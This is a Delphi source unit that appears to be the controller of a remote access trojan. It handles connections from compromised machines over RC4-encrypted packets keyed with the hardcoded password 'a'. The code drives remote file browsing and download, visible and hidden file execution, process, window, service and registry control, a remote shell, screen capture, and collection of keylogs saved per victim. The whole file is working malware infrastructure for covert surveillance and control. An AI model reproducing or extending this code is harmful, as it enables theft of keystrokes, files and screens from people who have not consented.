unit uClients;
interface
uses windows, SysUtils, winsock, Classes, uFunctions, ComCtrls, uCommands, uFlags,
     Graphics, ZlibEx;
const
  ADD_CONNITEM = 1;
  DELETE_CONNITEM = 2;
  ADD_LOG = 3;
  SET_FILEMANAGERSTAT = 4;
  ADD_FILEMANAGERDRIVEITEMS = 5;
  ADD_FILEMANAGERDIRECTORYITEMS = 6;
  ADD_FILEMANAGERFILEITEMS = 7;
  SET_MANAGERSTAT = 8;
  ADD_PROCMANAGERPROCITEM = 9;
  ADD_WINDOWMANAGERWINDOWITEM = 10;
  ADD_SERVMANAGERSERVITEM = 11;
  GET_SOCKETINFO = 12;
  UPDATE_TRANSFERLISTITEM = 13;
  KILL_TRANSFERITEM = 14;
type
  TClientThread = class(TThread)
  private
    mySocket:Integer;
    idJob:Integer;
    lstConnItem:TListItem;
    pStrList, pStrList2:TStringList;
    tmpString:String;
    function GetPacket(sSocket:integer; sPass:String):String;
    procedure ReceiveFile;
    procedure AddConnection;
    procedure ParseCommand(sSocket:Integer;sComm:Byte;sString:String);
    procedure DeleteListItem;
    procedure SetFilemanagerStatus;
    procedure AddFilemanagerDriveItems;
    procedure AddFilemanagerDirectoryItems;
    procedure AddFilemanagerFileItems;
    procedure SetManagerStatus;
    procedure AddProcmanagerProcItems;
    procedure AddWindowmanagerWindowItems;
    procedure AddServmanagerServItems;
    procedure GetSocketInfo;
    procedure UpdateTransferListItem;
    procedure KillTransferItem;
    procedure ReceiveVNC;
    procedure ReceiveNextVNC;
    procedure AddRegKeys;
    procedure AddRegValues;
    procedure SetRegManagerStatus;
    procedure AddShellOutput;
    procedure SetRemoteShellStatus;
    procedure ManageShell(Started:Boolean);
    procedure ReceiveKeylog;
    procedure GetKeylogInfo;
    procedure FixStream(MyFirstStream,MySecondStream,MyCompareStream:TMemorystream);
  protected
    procedure Execute; override;
  public
    myInfos:TTransferInfo;
    mSocketInfos:TSocketInfo;
    tMyThread:TThread;
    SocketType:Integer;
    streamVNCFull, streamPartial, streamDone:TMemoryStream;
    constructor Create(CreateSuspended: Boolean);
    procedure SetSocket(iSock:Integer);
    procedure DoSyncJob;
end;

Function Explode(sDelimiter: String; sSource: String): TStringList;

implementation
uses uMain;

Function Explode(sDelimiter: String; sSource: String): TStringList;
Var
  c: Word;
Begin
  Result := TStringList.Create;
  C := 0;
  While sSource <> '' Do
  Begin
    If Pos(sDelimiter, sSource) > 0 Then
    Begin
      Result.Add(Copy(sSource, 1, Pos(sDelimiter, sSource) - 1 ));
      Delete(sSource, 1, Length(Result[c]) + Length(sDelimiter));
    End
    Else
    Begin
      Result.Add(sSource);
      sSource := ''
    End;
    Inc(c);
  End;
End;

procedure TClientThread.DeleteListItem;
begin
  if lstConnItem <> nil then
    lstConnItem.Delete;
  CountConnections;
end;

procedure TClientThread.AddConnection;
var
  tempInfo:TListConnectionInfo;
begin
  //Create first Infos
  tempInfo := TListConnectionInfo.Create;
  tempInfo.mSocket := mySocket;
  lstConnItem := Form1.lvConnections.Items.Add;
  lstConnItem.Caption := pStrList[0];
  lstConnItem.SubItems.Add(RemoteAddress(mySocket));
  lstConnItem.SubItems.Add(pStrList[1]);
  lstConnItem.SubItems.Add(pStrList[2]);
  lstConnItem.SubItems.Add(pStrList[3]);
  lstConnItem.SubItems.Add(pStrList[4]);
  lstConnItem.SubItems.Add(pStrList[5]);
  lstConnItem.ImageIndex := GetFlag(pStrList[6]);
  lstConnItem.SubItems.Objects[0] := tempInfo;
  AddLog('Connection successfully established: ' + RemoteAddress(mySocket));
  CountConnections;
end;

procedure TClientThread.SetFilemanagerStatus;
var
  tempInfo:TListConnectionInfo;
begin
  tempInfo := TListConnectionInfo(lstConnItem.SubItems.Objects[0]);
  if tempInfo.fFilemanager <> nil then
    tempInfo.fFilemanager.stat1.Panels[0].Text := tmpString;
end;

procedure TClientThread.AddFilemanagerDriveItems;
var
  i,iTemp:integer;
  tempInfo:TListConnectionInfo;
begin
  tempInfo := TListConnectionInfo(lstConnItem.SubItems.Objects[0]);
  if tempInfo.fFilemanager <> nil then begin
    for i := 0 to pStrList.Count - 1 do begin
      pStrList2 := Explode('#',pStrList.Strings[i]);
      if pStrList2.Count = 2 then begin
        iTemp := tempInfo.fFilemanager.cbb1.Items.Add(pStrList2.Strings[0]);
        tempInfo.fFilemanager.cbb1.ItemsEx.Items[iTemp].ImageIndex := GetDriveIcon(pStrList2.Strings[1]);
      end;
    end;
  end;
end;

procedure TClientThread.AddFilemanagerDirectoryItems;
var
  i:integer;
  lstTemp:TListItem;
  tempInfo:TListConnectionInfo;
begin
  tempInfo := TListConnectionInfo(lstConnItem.SubItems.Objects[0]);
  if tempInfo.fFilemanager <> nil then begin
    for i := 0 to pStrList.Count - 1 do begin
      pStrList2 := Explode('#',pStrList.Strings[i]);
      if pStrList2.Count = 2 then begin
        lstTemp := tempInfo.fFilemanager.lvFiles.Items.Add;
        lstTemp.caption := (pStrList2.Strings[0]);
        lstTemp.Subitems.Add('Directory');
        lstTemp.subitems.add('-');
        lstTemp.ImageIndex := 7;
      end;
    end;
  end;
end;

procedure TClientThread.AddFilemanagerFileItems;
var
  i:integer;
  lstTemp:TListItem;
  tempInfo:TListConnectionInfo;
begin
  tempInfo := TListConnectionInfo(lstConnItem.SubItems.Objects[0]);
  if tempInfo.fFilemanager <> nil then begin
    for i := 0 to pStrList.Count - 1 do begin
      pStrList2 := Explode('#',pStrList.Strings[i]);
      if pStrList2.Count = 3 then begin
        lstTemp := tempInfo.fFilemanager.lvFiles.Items.Add;
        lstTemp.caption := (pStrList2.Strings[0]);
        lstTemp.Subitems.Add(pStrList2.Strings[1]);
        lstTemp.subitems.add(GetByteSize(pStrList2.Strings[2]));
        lstTemp.ImageIndex := 8;
      end;
    end;
  end;
end;

procedure TClientThread.SetManagerStatus;
var
  tempInfo:TListConnectionInfo;
begin
  tempInfo := TListConnectionInfo(lstConnItem.SubItems.Objects[0]);
  if tempInfo.fManager <> nil then
    tempInfo.fManager.stat1.Panels[0].Text := tmpString;
end;

procedure TClientThread.SetRegManagerStatus;
var
  tempInfo:TListConnectionInfo;
begin
  tempInfo := TListConnectionInfo(lstConnItem.SubItems.Objects[0]);
  if tempInfo.fRegistry <> nil then
    tempInfo.fRegistry.stat1.Panels[0].Text := tmpString;
end;

procedure TClientThread.SetRemoteShellStatus;
var
  tempInfo:TListConnectionInfo;
begin
  tempInfo := TListConnectionInfo(lstConnItem.SubItems.Objects[0]);
  if tempInfo.fRemoteShell <> nil then
    tempInfo.fRemoteShell.stat1.Panels[0].Text := tmpString;
end;

procedure TClientThread.AddProcmanagerProcItems;
var
  i:integer;
  lstTemp:TListItem;
  tempInfo:TListConnectionInfo;
begin
  tempInfo := TListConnectionInfo(lstConnItem.SubItems.Objects[0]);
  if tempInfo.fManager <> nil then begin
    for i := 0 to pStrList.Count - 1 do begin
      pStrList2 := Explode('#',pStrList.Strings[i]);
      if pStrList2.Count = 3 then begin
        lstTemp := tempInfo.fManager.lvProcess.Items.Add;
        lstTemp.caption := (pStrList2.Strings[0]);
        lstTemp.Subitems.Add(pStrList2.Strings[1]);
        lstTemp.subitems.add(pStrList2.Strings[2]);
        lstTemp.ImageIndex := 1;
      end;
    end;
  end;
end;

procedure TClientThread.AddWindowmanagerWindowItems;
var
  i:integer;
  lstTemp:TListItem;
  tempInfo:TListConnectionInfo;
begin
  tempInfo := TListConnectionInfo(lstConnItem.SubItems.Objects[0]);
  if tempInfo.fManager <> nil then begin
    for i := 0 to pStrList.Count - 1 do begin
      pStrList2 := Explode('#',pStrList.Strings[i]);
      if pStrList2.Count = 3 then begin
        lstTemp := tempInfo.fManager.lvWindow.Items.Add;
        lstTemp.caption := (pStrList2.Strings[0]);
        lstTemp.Subitems.Add(pStrList2.Strings[2]);
        lstTemp.subitems.add(pStrList2.Strings[1]);
        lstTemp.ImageIndex := 4;
      end;
    end;
  end;
end;

procedure TClientThread.AddServmanagerServItems;
var
  i:integer;
  lstTemp:TListItem;
  tempInfo:TListConnectionInfo;
begin
  tempInfo := TListConnectionInfo(lstConnItem.SubItems.Objects[0]);
  if tempInfo.fManager <> nil then begin
    for i := 0 to pStrList.Count - 1 do begin
      pStrList2 := Explode('#',pStrList.Strings[i]);
      if pStrList2.Count = 3 then begin
        lstTemp := tempInfo.fManager.lvService.Items.Add;
        lstTemp.caption := (pStrList2.Strings[0]);
        lstTemp.Subitems.Add(pStrList2.Strings[1]);
        lstTemp.subitems.add(pStrList2.Strings[2]);
        lstTemp.ImageIndex := 7;
      end;
    end;
  end;
end;

procedure TClientThread.AddRegKeys;
var
  i:integer;
  lstTemp:TListItem;
  tempInfo:TListConnectionInfo;
begin
  tempInfo := TListConnectionInfo(lstConnItem.SubItems.Objects[0]);
  if tempInfo.fRegistry <> nil then begin
    for i := 0 to pStrList.Count - 1 do begin
      lstTemp := tempInfo.fRegistry.lvKeys.Items.Add;
      lstTemp.caption := (pStrList.Strings[i]);
      lstTemp.ImageIndex := 0;
    end;
  end;
end;

procedure TClientThread.AddRegValues;
var
  i:integer;
  lstTemp:TListItem;
  tempInfo:TListConnectionInfo;
begin
  tempInfo := TListConnectionInfo(lstConnItem.SubItems.Objects[0]);
  if tempInfo.fRegistry <> nil then begin
    for i := 0 to pStrList.Count - 1 do begin
      pStrList2 := Explode('#',pStrList.Strings[i]);
      if pStrList2.Count = 3 then begin
        lstTemp := tempInfo.fRegistry.lvValues.Items.Add;
        lstTemp.caption := (pStrList2.Strings[0]);
        lstTemp.Subitems.Add(pStrList2.Strings[1]);
        lstTemp.subitems.add(pStrList2.Strings[2]);
        lstTemp.ImageIndex := 1;
      end;
    end;
  end;
end;

procedure TClientThread.AddShellOutput;
var
  tempInfo:TListConnectionInfo;
begin
  tempInfo := TListConnectionInfo(lstConnItem.SubItems.Objects[0]);
  if tempInfo.fRemoteShell <> nil then begin
    with tempInfo.fRemoteShell do begin
      redt1.Lines.Add(tmpString);
      redt1.SelStart := Length(redt1.Text);
    end;
  end;
end;

procedure TClientThread.ManageShell(Started:Boolean);
var
  tempInfo:TListConnectionInfo;
begin
  tempInfo := TListConnectionInfo(lstConnItem.SubItems.Objects[0]);
  if tempInfo.fRemoteShell <> nil then begin
    if Started then begin
      tempInfo.fRemoteShell.edt1.Enabled := True;
      tempInfo.fRemoteShell.pm1.Items.Items[0].Enabled := False;
      tempInfo.fRemoteShell.pm1.Items.Items[1].Enabled := True;
    end else begin
      tempInfo.fRemoteShell.edt1.Enabled := False;
      tempInfo.fRemoteShell.pm1.Items.Items[0].Enabled := True;
      tempInfo.fRemoteShell.pm1.Items.Items[1].Enabled := false;
    end;
  end;
end;

procedure TClientThread.KillTransferItem;
begin
  mSocketInfos.lvItem.Delete;
end;

procedure TClientThread.ReceiveFile;
var
  streamFile:TMemoryStream;
  recvLen:Integer;
  bBuff:Array[0..8191] of Byte;
begin
  streamFile := TMemoryStream.Create;
  Sleep(1000);
  SendPacket(mySocket,PACK_DOWNLOADFILE,'',mSocketInfos.sRemotePath);
  repeat
    ZeroMemory(@bBuff[0],8192);
    recvLen := recv(mySocket,bBuff[0],8192,0);
    if recvLen <= 0 then
      break;
    myInfos.lReceivedSize := streamFile.Size;
    idJob := UPDATE_TRANSFERLISTITEM;
    Synchronize(DoSyncJob);
    streamFile.Write(bBuff,recvLen);
  until 1 = 3;
  streamFile.SaveToFile(mSocketInfos.sLocalPath);
  streamFile.Free;
  idJob := KILL_TRANSFERITEM;
  Synchronize(DoSyncJob);
end;

procedure TClientThread.ReceiveKeylog;
var
  streamFile:TMemoryStream;
  recvLen:Integer;
  bBuff:Array[0..8191] of Byte;
begin
  streamFile := TMemoryStream.Create;
  Sleep(1000);
  SendPacket(mySocket,PACK_KEYLOGSEND,'','');
  repeat
    ZeroMemory(@bBuff[0],8192);
    recvLen := recv(mySocket,bBuff[0],8192,0);
    if recvLen <= 0 then
      break;
    streamFile.Write(bBuff,recvLen);
  until 1 = 3;
  if streamFile.Size > 0 then
    streamFile.SaveToFile(mSocketInfos.sLocalPath);
  streamFile.Free;
end;

procedure TClientThread.ReceiveVNC;
var
  recvLen:Integer;
  bBuff:Array[0..8191] of Byte;
  bmpVNC:TBitmap;
  tempStream:TMemoryStream;
begin
  if Assigned(streamVNCFull) = false then
    streamVNCFull := TMemoryStream.Create;
  tempStream := TMemoryStream.Create;
  streamVNCFull.Clear;
  repeat
    ZeroMemory(@bBuff[0],8192);
    recvLen := recv(mySocket,bBuff[0],8192,0);
    if recvLen <= 0 then
      break;
    tempStream.Write(bBuff[0],recvLen);
    myInfos.lReceivedSize := tempStream.Size;
    //idJob := UPDATE_TRANSFERLISTITEM;
    //Synchronize(DoSyncJob);
  until myInfos.lReceivedSize >= myInfos.lFileSize;
  //Decompress this shit
  tempStream.Seek(0, soFromBeginning);
  ZDecompressStream(tempStream,streamVNCFull);
  streamVNCFull.Position := 0;
  bmpVNC := TBitmap.Create;
  bmpVNC.LoadFromStream(streamVNCFull);
  mSocketInfos.fVNC.img1.Picture.Bitmap.Assign(bmpVNC);
  //Free and Clear
  bmpVNC.Free;
  tempStream.Free;
end;

procedure TClientThread.ReceiveNextVNC;
var
  recvLen:Integer;
  bBuff:Array[0..8191] of Byte;
  bmpVNC:TBitmap;
  sTempStream:TMemoryStream;
begin
  if Assigned(streamPartial) = false then
    streamPartial := TMemoryStream.Create;
  if assigned(streamDone) = false then
    streamDone := TMemoryStream.Create;
  sTempStream := TMemoryStream.Create;
  repeat
    ZeroMemory(@bBuff[0],8192);
    recvLen := recv(mySocket,bBuff[0],8192,0);
    if recvLen <= 0 then
      break;
    streamPartial.Write(bBuff[0],recvLen);
    myInfos.lReceivedSize := streamPartial.Size;
    //idJob := UPDATE_TRANSFERLISTITEM;
    //Synchronize(DoSyncJob);
    //streamVNCFull.Write(bBuff,recvLen);
  until myInfos.lReceivedSize >= myInfos.lFileSize;
  streamPartial.Seek(0, soFromBeginning);
  ZDecompressStream(streamPartial,sTempStream);
  FixStream(streamVNCFull,streamDone,sTempStream);
  streamDone.Position := 0;
  bmpVNC := TBitmap.Create;
  bmpVNC.LoadFromStream(streamDone);
  mSocketInfos.fVNC.img1.Picture.Bitmap.Assign(bmpVNC);
   //
  streamVNCFull.Clear;
  streamVNCFull.LoadFromStream(streamDone);
  //
  streamPartial.Clear;
  streamDone.Clear;
  FreeAndNil(sTempStream);
  bmpVNC.Free;
end;

procedure TClientThread.FixStream(MyFirstStream,MySecondStream,MyCompareStream:TMemorystream);
var
  I: Integer;
  P1, P2, P3: ^Char;
begin
 P1 := MyFirstStream.Memory;
  MySecondStream.SetSize(MyFirstStream.Size);
  P2 := MySecondStream.Memory;
  P3 := MyCompareStream.Memory;

  for I := 0 to MyFirstStream.Size - 1 do
  begin
    if P3^ = '0' then
      P2^ := p1^
    else
      P2^ := P3^;
    Inc(P1);
    Inc(P2);
    Inc(P3);
  end;
end;

procedure TClientThread.GetSocketInfo;
var
  i:Integer;
  fList:TList;
begin
  try
    if SocketType = SOCK_VNC then
      fList := Form1.VNCList.LockList
    else
      fList := Form1.TransferList.LockList;
    for I := 0 to fList.Count - 1 do begin
      if TSocketInfo(fList.Items[i]).lSocketID = myInfos.lSocketID  then begin
        if TSocketInfo(fList.Items[i]).lTransferID = myInfos.lDownloadID then begin
          mSocketInfos := TSocketInfo(fList.Items[i]);
          break;
        end;
      end;
    end;
  finally
    Form1.TransferList.UnlockList;
  end;
end;

procedure TClientThread.GetKeylogInfo;
var
  i:Integer;
  fList:TList;
begin
  try
    fList := Form1.KeylogList.LockList;
    for I := 0 to fList.Count - 1 do begin
      if TSocketInfo(fList.Items[i]).lSocketID = myInfos.lSocketID  then begin
        mSocketInfos := TSocketInfo(fList.Items[i]);
        break;
      end;
    end;
  finally
    Form1.KeylogList.UnlockList;
  end;
end;

procedure TClientThread.UpdateTransferListItem;
var
  cSpeed:Cardinal;
begin
  try
    cSpeed :=  (myInfos.lReceivedSize div (GetTickCount() - myInfos.lStarted)) * 1024;
    with mSocketInfos.lvItem.SubItems do begin
      Strings[0] := GetByteSize(Inttostr(cSpeed)) + '/s';
      Strings[1] :=  GetPercent(myInfos.lReceivedSize, myInfos.lFileSize);
      Strings[2] := GetByteSize(IntToStr(myInfos.lFileSize)) + '/' + GetByteSize(IntToStr(myInfos.lReceivedSize))
    end;
  except

  end;
end;

procedure TClientThread.DoSyncJob;
begin
  case idJob of
    ADD_CONNITEM: AddConnection;
    DELETE_CONNITEM: DeleteListItem;
    ADD_LOG: AddLog(tmpString);
    SET_FILEMANAGERSTAT: SetFilemanagerStatus;
    ADD_FILEMANAGERDRIVEITEMS: AddFilemanagerDriveItems;
    ADD_FILEMANAGERDIRECTORYITEMS: AddFilemanagerDirectoryItems;
    ADD_FILEMANAGERFILEITEMS: AddFilemanagerFileItems;
    SET_MANAGERSTAT: SetManagerStatus;
    ADD_PROCMANAGERPROCITEM: AddProcmanagerProcItems;
    ADD_WINDOWMANAGERWINDOWITEM: AddWindowmanagerWindowItems;
    ADD_SERVMANAGERSERVITEM: AddServmanagerServItems;
    GET_SOCKETINFO: GetSocketInfo;
    UPDATE_TRANSFERLISTITEM: UpdateTransferListItem;
    KILL_TRANSFERITEM: KillTransferItem;
  end;
end;

procedure TClientThread.ParseCommand(sSocket:Integer;sComm:Byte;sString:String);
begin
  case sComm of
    PACK_AUTH:
    begin
      pStrList := Explode('|',sString);
      if pStrList.Count <> 7 then begin
        idJob := ADD_LOG;
        tmpString := 'Wrong Password! Connection will be closed: ' + RemoteAddress(sSocket);
        Synchronize(DoSyncJob);
        closeSocket(sSocket);
        exit;
      end else begin
        idJob := ADD_CONNITEM;
        Synchronize(DoSyncJob);
      end;
    end;
    PACK_GETDRIVES:
    begin
      if sString = 'Error' then begin
        idJob := SET_FILEMANAGERSTAT;
        tmpString := 'Counldnt list drives';
        Synchronize(DoSyncJob);
        exit;
      end;
      pStrList := Explode('|',sString);
      if pStrList.Count <> 0 then begin
        idJob := ADD_FILEMANAGERDRIVEITEMS;
        Synchronize(DoSyncJob);
        //-----------------------------
        idJob := SET_FILEMANAGERSTAT;
        tmpString := 'Drives listed';
        Synchronize(DoSyncJob);
      end;
    end;
    PACK_GETDIRS:
    begin
      if sString = 'Error' then begin
        idJob := SET_FILEMANAGERSTAT;
        tmpString := 'Error! Cant access!';
        Synchronize(DoSyncJob);
        exit;
      end;
      pStrList := Explode('|',sString);
      if pStrList.Count <> 0 then begin
        idJob := ADD_FILEMANAGERDIRECTORYITEMS;
        Synchronize(DoSyncJob);
      end;
      //---------------------------------------
      idJob := SET_FILEMANAGERSTAT;
      tmpString := 'Requesting files...';
      Synchronize(DoSyncJob);
    end;
    PACK_GETFILES:
    begin
      pStrList := Explode('|',sString);
      if pStrList.Count <> 0 then begin
        idJob := ADD_FILEMANAGERFILEITEMS;
        Synchronize(DoSyncJob);
      end;
      idJob := SET_FILEMANAGERSTAT;
      tmpString := 'Files listed';
      Synchronize(DoSyncJob);
    end;
    PACK_EXECUTEFILEVISIBLE:
    begin
      if sString = '1' then
        tmpString := 'File executed successfully!'
      else
        tmpString := 'File cant be executed!';
      idJob := SET_FILEMANAGERSTAT;
      Synchronize(DoSyncJob);
    end;
    PACK_EXECUTEFILEHIDDEN:
    begin
      if sString = '1' then
        tmpString := 'File executed successfully!'
      else
        tmpString := 'File cant be executed!';
      idJob := SET_FILEMANAGERSTAT;
      Synchronize(DoSyncJob);
    end;
    PACK_DELETEFILE:
    begin
      if sString = '1' then
        tmpString := 'File deleted successfully!'
      else
        tmpString := 'File cant be deleted!';
      idJob := SET_FILEMANAGERSTAT;
      Synchronize(DoSyncJob);
    end;
    PACK_MOVEFILE:
    begin
      if sString = '1' then
        tmpString := 'File renamed successfully!'
      else
        tmpString := 'File cant be renamed!';
      idJob := SET_FILEMANAGERSTAT;
      Synchronize(DoSyncJob);
    end;
    PACK_DOWNLOADFILE:
    begin
      pStrList := Explode('|',sString);
      if pStrList.Count = 3 then begin
        SocketType := SOCK_DOWNLOAD;
        myInfos.lFileSize := StrToInt(pStrList[2]);
        myInfos.lReceivedSize := 0;
        myInfos.lStarted := GetTickCount;
        myInfos.lSocketID := StrToInt(pStrList[0]);
        myInfos.lDownloadID := StrToInt(pStrList[1]);
        idJob := GET_SOCKETINFO;
        Synchronize(DoSyncJob);
        if mSocketInfos <> nil then begin
          mSocketInfos.lvItem.SubItems.Strings[2] := GetByteSize(IntToStr(myInfos.lFileSize)) + '/0 Bytes';
          mSocketInfos.lvItem.SubItems.Strings[3] := 'Downloading...';
          ReceiveFile;
        end else
          closeSocket(mySocket);
      end;
    end;
    PACK_KEYLOGSEND:
    begin
      myInfos.lSocketID := StrToInt(sString);
      GetKeylogInfo;
      if mSocketInfos <> nil then begin
        mSocketInfos.fKeylog.stat1.Panels.Items[0].Text := 'Receiving Keylog...';
        tmpString := TimeTostr(Time);
        tmpString := StringReplace(tmpString , ':', '_',[rfReplaceAll, rfIgnoreCase]);
        mSocketInfos.sLocalPath := GetUserFolder(mSocketInfos.fKeylog.sUsername + '\Keylogs\' + DateToStr(Date)) + tmpString + '.txt';
        ReceiveKeylog;
        mSocketInfos.fKeylog.stat1.Panels.Items[0].Text := 'Received Keylog!';
        mSocketInfos.fKeylog.ListKeylogs;
      end else
        closeSocket(mySocket);
    end;
    PACK_PROCESSES:
    begin
      pStrList := Explode('|',sString);
      if pStrList.Count <> 0 then begin
        idJob := ADD_PROCMANAGERPROCITEM;
        Synchronize(DoSyncJob);
      end;
      tmpString := 'Processes listed';
      idJob := SET_MANAGERSTAT;
      Synchronize(DoSyncJob);
    end;
    PACK_TERMINATEPROCESS:
    begin
      if sString = '1' then
        tmpString := 'Process terminated successfully!'
      else
        tmpString := 'Process cant be terminated!';
      idJob := SET_MANAGERSTAT;
      Synchronize(DoSyncJob);
    end;
    PACK_ENUMWINDOW:
    begin
      pStrList := Explode('|',sString);
      if pStrList.Count <> 0 then begin
        idJob := ADD_WINDOWMANAGERWINDOWITEM;
        Synchronize(DoSyncJob);
      end;
      tmpString := 'Windows listed';
      idJob := SET_MANAGERSTAT;
      Synchronize(DoSyncJob);
    end;
    PACK_WINDOWMAX:
    begin
      tmpString := 'Window maximized successfully!';
      idJob := SET_MANAGERSTAT;
      Synchronize(DoSyncJob);
    end;
    PACK_WINDOWMIN:
    begin
      tmpString := 'Window minimized successfully!';
      idJob := SET_MANAGERSTAT;
      Synchronize(DoSyncJob);
    end;
    PACK_WINDOWCLOSE:
    begin
      tmpString := 'Window closed successfully!';
      idJob := SET_MANAGERSTAT;
      Synchronize(DoSyncJob);
    end;
    PACK_ENUMSERVICE:
    begin
      pStrList := Explode('|',sString);
      if pStrList.Count <> 0 then begin
        idJob := ADD_SERVMANAGERSERVITEM;
        Synchronize(DoSyncJob);
      end;
      tmpString := 'Services listed';
      idJob := SET_MANAGERSTAT;
      Synchronize(DoSyncJob);
    end;
    PACK_STARTSERVICE:
    begin
      tmpString := 'Service started successfully!';
      idJob := SET_MANAGERSTAT;
      Synchronize(DoSyncJob);
    end;
    PACK_STOPSERVICE:
    begin
      tmpString := 'Service stopped successfully!';
      idJob := SET_MANAGERSTAT;
      Synchronize(DoSyncJob);
    end;
    PACK_VNCSOCKET:
    begin
      pStrList := Explode('|',sString);
      if pStrList.Count = 3 then begin
        SocketType := SOCK_VNC;
        myInfos.lSocketID := StrToInt(pStrList[0]);
        myInfos.lDownloadID := 0;
        idJob := GET_SOCKETINFO;
        Synchronize(DoSyncJob);
        if mSocketInfos <> nil then begin
          with mSocketInfos.fVNC do begin
            sVNCSocket := mySocket;
            hHeight := StrToInt(pStrList[2]);
            hWidth := StrToInt(pStrList[1]);
            stat1.Panels.Items[0].Text := 'Connected!';
            FormResize(nil);
            FormShow(nil);
          end;
        end else
          closeSocket(mySocket);
      end;
    end;
    PACK_STARTVNC:
    begin
      myInfos.lFileSize := StrToInt(sString);
      ReceiveVNC;
      if mSocketInfos.fVNC.btn1.Down then begin
        mSocketInfos.fVNC.RequestNextImage;
      end;
    end;
    PACK_VNCDATA:
    begin
      myInfos.lFileSize := StrToInt(sString);
      ReceiveNextVNC;
      if mSocketInfos.fVNC.btn1.Down then begin
        mSocketInfos.fVNC.RequestNextImage;
      end;
    end;
    PACK_ENUMKEYS:
    begin
      pStrList := Explode('|',sString);
      if pStrList.Count <> 0 then begin
        AddRegKeys;
      end;
      tmpString := 'Registrykeys received!';
      SetRegManagerStatus;
    end;
    PACK_ENUMVALUES:
    begin
      pStrList := Explode('|',sString);
      if pStrList.Count <> 0 then begin
        AddRegValues;
      end;
      tmpString := 'Registryvalues received!';
      SetRegManagerStatus;
    end;
    PACK_REGADD:
    begin
      if sString = '1' then
        tmpString := 'Registrykey added!'
      else
        tmpString := 'Couldnt add Registrykey!';
      SetRegManagerStatus;
    end;
    PACK_REGDELETE:
    begin
      if sString = '1' then
        tmpString := 'Registrykey deleted!'
      else
        tmpString := 'Cant delete Registrykey!';
      SetRegManagerStatus;
    end;
    PACK_REGRENAME:
    begin
      if sString = '1' then
        tmpString := 'Registrykey renamed!'
      else
        tmpString := 'Cant rename Registrykey!';
      SetRegManagerStatus;
    end;
    PACK_SHELLSTART:
    begin
      ManageShell(True);
      tmpString := 'Shell started!';
      SetRemoteShellStatus;
    end;
    PACK_SHELLSTOP:
    begin
      ManageShell(False);
      tmpString := 'Shell closed!';
      SetRemoteShellStatus;
    end;
    PACK_SHELLDATA:
    begin
      tmpString := sString;
      Synchronize(AddShellOutput);
      tmpString := 'Data received!';
      SetRemoteShellStatus;
    end;
  end;
end;
function TClientThread.GetPacket(sSocket:integer; sPass:String):String;
var
  bArr:array[0..4095] of Byte;
  bByte:Byte;
  tempStr, sData:String;
  dwLen:Integer;
  dwPacketSize, dwRealLen:Cardinal;
  pPointer:Pointer;
begin
  repeat
    ZeroMemory(@barr[0],4096);
    dwLen := recv(sSocket,bArr[0],4096,0);
    if (dwLen <= 0) then break;
    SetLength(tempStr,dwLen);
    MoveMemory(@tempStr[1],@bArr[0],dwLen);
    sData := sData + tempStr;
    repeat
      pPointer := @sData[1];
      dwPacketSize := LPSocketHeader(pPointer)^.dwPackLen;
      dwRealLen := Length(sData) - SizeOf(TCustomPacketHeader);
      If dwPacketSize <= dwRealLen then begin
        bByte := LPSocketHeader(pPointer)^.bPackType;
        If LPSocketHeader(pPointer)^.bFlag = $02 then begin
          Delete(sData,1,SizeOf(TCustomPacketHeader));
          tempStr := copy(sData,1,dwPacketSize);
          Delete(sData,1,dwPacketSize);
          tempStr := Rc4(tempStr,sPass);
        end else begin
          Delete(sData,1,SizeOf(TCustomPacketHeader));
          tempStr := copy(sData,1,dwPacketSize);
          Delete(sData,1,dwPacketSize);
        end;
        ParseCommand(sSocket,bByte,tempStr);
        tempStr := '';
      end else break;
    until sData = '';
  until 1 = 3;
end;

procedure TClientThread.Execute;
begin
  GetPacket(mySocket,'a');
  idJob := DELETE_CONNITEM;
  Synchronize(DoSyncJob);
end;

constructor TClientThread.Create(CreateSuspended: Boolean);
begin
  inherited;
  mySocket := 0;
end;

procedure TClientThread.SetSocket(iSock:Integer);
begin
  mySocket := iSock;
end;

end.

